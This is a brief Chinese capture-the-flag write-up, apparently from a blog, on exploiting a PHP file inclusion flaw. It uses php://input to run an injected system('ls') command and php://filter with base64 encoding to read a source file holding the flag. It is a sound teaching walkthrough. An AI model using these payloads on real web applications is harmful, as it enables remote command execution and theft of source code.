文件包含漏洞

PHP输入流

php://input
php://input可以读取没有处理过的POST数据,也可以获取get的
php://input不能用于enctype=multipart/form-data” 

首先看
在这里插入图片描述
题目给我们看的是phpinfo.php
提示说文件包含漏洞,php输入流使用,用Burp来首先抓包
在这里插入图片描述
然后再URL那一栏加上

?path=php://input
再在下方写入我们要传入的东西
<?php echo system('ls');?>

在这里插入图片描述
然后会爆出下面的目录在这里插入图片描述
除了第一个目录基本都试过了,所以我们试试第一个目录,用php://filter

?path=php://filter/read=convert.base64-encode/resource=dle345aae.php

得到一个base64位编码:在这里插入图片描述
解密后得到flag

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值